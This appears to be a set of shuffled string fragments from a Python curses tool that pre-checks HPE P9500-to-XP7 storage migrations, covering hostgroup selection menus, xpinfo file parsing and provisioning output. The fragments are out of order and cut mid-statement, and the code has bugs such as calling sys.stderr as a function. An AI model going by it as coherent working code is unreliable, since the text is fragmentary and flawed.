"LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N,",
"sys.exit(1) if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No serial",
"+= n if self.position < 0: self.position = 0 elif self.position >= len(self.filtered_items):",
"= cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file",
"<= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break",
"display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line = line[:self.width-1]",
"curses.doupdate() for index,item in enumerate(self.items): if index == self.position: mode = curses.A_STANDOUT else:",
"received the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def",
"select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list =",
"= row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV",
"stdscr.clear() ### check window heigth and width ### if curses.COLS < 20 or",
"#################################################################################################### ### VARIABLES #################################################################################################### linelen = 100 boxpair_dict = {} serialnbr_dict = {}",
"self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if self.position < 0:",
"self.position >= len(self.items): self.position = len(self.items) - 1 def display(self): self.panel.top() self.panel.show() self.window.clear()",
"= self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def",
"boxes ### ######################### for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in",
"\"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box {} :\".format(box_name)) logger.info(box_dict[box_name])",
"hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the selection ### for",
"= 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel =",
"\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line)",
"for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth",
"curses.doupdate() def set(self,search_str): self.search_str = search_str self.display() def clear(self): self.search_str = \"\" self.display()",
"if self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1: ###",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items = items self.items.append((\"exit\",\"exit\")) def",
"display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the list to display",
">= 1: self.slice_start += n if self.slice_start < 0: self.slice_start = 0 self.slice_end",
"sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ###",
"== len(self.items) - 1: break else: self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1) elif",
"= set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add",
"= stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win ###",
"### self.slice_start += n if self.slice_start < 0: self.slice_start = 0 self.slice_end =",
"### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this",
"menu structure added 1.2 Add search term criteria 1.3 Add config file 2.0",
"self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position ==",
"in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try:",
"serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No serial nbr defined for box {},",
"1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict:",
"slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True:",
"= Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host (hba_wwn) ### select_item_dict",
"self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str self.display() def clear(self): self.search_str = \"\"",
"self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the list to display ### self.display_list =",
"list to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name):",
"= stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win =",
"or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define",
"= {} box_dict = {} #################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES ####################################################################################################",
"logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate",
"key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) -",
"stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ### define selection_win",
"slide slice up ### self.slice_start += n if self.slice_start < 0: self.slice_start =",
"cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir",
"= \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line) >= self.width: line =",
"0 def navigate(self,n): self.position += n if self.position < 0: self.position = 0",
"SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups by box ### for boxpair_name",
"mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line)",
"len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position = {}, n =",
"= set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr]",
"in self.selection])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate()",
"self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif key",
"sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide()",
"self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end ))",
"sys import os import os.path import csv import string import xp7 #################################################################################################### ###",
"Add config file 2.0 Consistency check update 2.1 Add xpinfo file processing CONFIG",
"1: self.slice_start += n if self.slice_start < 0: self.slice_start = 0 self.slice_end =",
"HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host (hba_wwn) ### select_item_dict = {} for boxpair_name",
"logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in site_dict: site = site_dict[box_name] else:",
"= \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section):",
"\"\"\" update the list of xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list",
"file and daemon to pairdisplay & check on status #################################################################################################### \"\"\" import curses",
"= self.window.getmaxyx() self.title = title self.consistent = [] def display(self): self.window.clear() line =",
"adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif key",
"self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if index",
"index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif",
"self.reply = \"\" self.update_object = upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear() line =",
"in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr])))",
"+ self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if len(item)",
"self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top()",
"as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def",
"serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict, now at {}",
"- 1 def display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def navigate(self,n): if n < 0:",
"line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line) >=",
"1 if n < 0: if self.position - self.slice_start < 2 and self.slice_start",
"self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection = selection def update(self):",
"<= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break",
"2 and self.slice_start >= 1: ### slide slice up ### self.slice_start += n",
"search term criteria 1.3 Add config file 2.0 Consistency check update 2.1 Add",
"len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict",
"now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short to be valid, skipping",
"for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif",
"matching this SEARCH expression\",stdscr) search.display() ### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection",
"hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item",
"self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if len(item) >= self.width: item =",
"= title self.selection = [] def display(self): self.window.clear() line = \"{} : {}\".format(self.title,",
"section missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()]",
"self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection",
"AUTHOR : <NAME> / StorageTeam VERSION : Based on previous ODR framework 1.0",
"else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item) line = \"{}\".format(item) if",
"expression\",stdscr) search.display() ### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr)",
"box_name in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the",
"show hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display))",
"ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary",
"self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if",
"not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not",
"### write out the ldevs to file ### for box_name,hostgroup_name in self.consistent.get(): if",
"= box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list during",
"os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0",
"self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode)",
"= [] self.consistent = consistent def navigate(self,n): if n < 0: if self.slice_start",
"self.xpinfo_dir = xpinfo_dir self.selection = selection def update(self): \"\"\" update the list of",
"self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set))",
"elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short to be valid, skipping {}\".format(row)) ### translate",
"x in self.consistent])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh()",
"define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border()",
"0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window)",
"window self.consistent = consistent self.map_dir = map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position",
"serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict: hostgroup_dict[box_name] =",
"= set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file",
"slice ### # logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line)) if self.slice_start <=",
"######################### for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.selection = selection self.search =",
"executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key",
"= {} collectfile_dict = {} box_dict = {} #################################################################################################### ### FUNCTIONS #################################################################################################### ####################################################################################################",
"self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update items to match search all\") self.filtered_items",
"to match search str {}\".format(self.search.get())) self.filtered_items = [x for x in self.items.keys() if",
"key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to file ### for box_name,hostgroup_name",
"defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name",
"value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\") except:",
"= copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a view on the items which fits",
"except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except:",
"TODO : add generate temporary horcm file and daemon to pairdisplay & check",
"slide slice down ### self.slice_end += n if self.slice_end > len(self.xpinfo_file_list) - 1:",
"ODR framework 1.0 Initial version 1.1 Curses menu structure added 1.2 Add search",
"= stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ### define",
"self.display_list = [] self.consistent = consistent def navigate(self,n): if n < 0: if",
"self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP: self.navigate(-1) elif key",
"1: ### slide slice down ### self.slice_end += n if self.slice_end > len(self.xpinfo_file_list)",
"HOSTGROUPs ? (Y/n)\") key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.selection = selection self.search",
"##################### ### start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level)",
"0 self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up to {}-{}\".format(self.slice_start,self.slice_end",
"if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No serial nbr",
"files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir)",
"[ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1: break",
"line {}\".format(line)) if self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index in",
"self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent =",
"about to addstr line {}\".format(line)) if self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display",
"int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in",
"### if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key",
"file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value",
"= len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show()",
"def main(stdscr): ### clear screen ### stdscr.clear() ### check window heigth and width",
"set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host",
"< 20 or curses.LINES < 20: sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1)",
"if len(row) > 8: hostname = row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5])",
"Consistent(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.consistent",
"else: logger.error(\"XPINFO: line too short to be valid, skipping {}\".format(row)) ### translate ldev",
"enumerate(self.display_list): if len(item) >= self.width: item = item[:self.width-1] if self.slice_start <= index <=",
"#################### configfile = \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if",
"display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if",
"stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0)",
"self.display() def get(self): return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] self.consistent = consistent def navigate(self,n): if",
"the consistent HOSTGROUPs ? (Y/n)\") key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ###",
"self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update",
"class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start",
"log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined,",
"{} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added",
"serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if",
"menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display))",
"HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr)",
"self.window = window self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list",
"serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {} for serial_nbr in serial_nbr_set:",
"= line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position ==",
"### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ###",
"while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if index == self.position:",
"all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len",
"add found hostgroups to the selection ### for box_name in hostgroup_dict: for hostgroup_name",
"= cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1) try: map_dir =",
"### self.slice_end += n if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list)",
"serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger",
"update 2.1 Add xpinfo file processing CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO",
": xpmig.ini LOG : xpmig_precheck.log TODO : add generate temporary horcm file and",
"= [] def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent]))",
"added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name))",
"{} collectfile_dict = {} box_dict = {} #################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ###",
"def display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items):",
":: update items to match search str {}\".format(self.search.get())) self.filtered_items = [x for x",
"self.consistent])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def",
"processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {} for serial_nbr",
"main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show",
"== curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window =",
"= set() ### process the selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f:",
"def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"### stdscr.refresh() stdscr.getkey() #################### ### parse config ### #################### configfile = \"xpmig.ini\" cfg",
"### for index,item in enumerate(self.xpinfo_file_list): if index == self.position: mode = curses.A_STANDOUT else:",
"instance_dict = {} site_dict = {} collectfile_dict = {} box_dict = {} ####################################################################################################",
"self.consistent = consistent def navigate(self,n): if n < 0: if self.slice_start >= 1:",
"Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT",
"dict ### self.items = items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a",
"PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win",
"self.slice_len self.position = 0 def navigate(self,n): self.position += n if self.position < 0:",
"\"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by",
"# menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH",
"== curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window =",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.selection = selection self.search = search",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning",
"results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display))",
"the selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for",
"== curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr):",
"box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to display ### self.slice_start",
"__init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"self.title = title self.selection = [] def display(self): self.window.clear() line = \"{} :",
"key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window",
"### fill the list to display ### self.display_list = [] for box_name,hostgroup_name in",
"< 0: self.position = 0 elif self.position >= len(self.items): self.position = len(self.items) -",
"ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to",
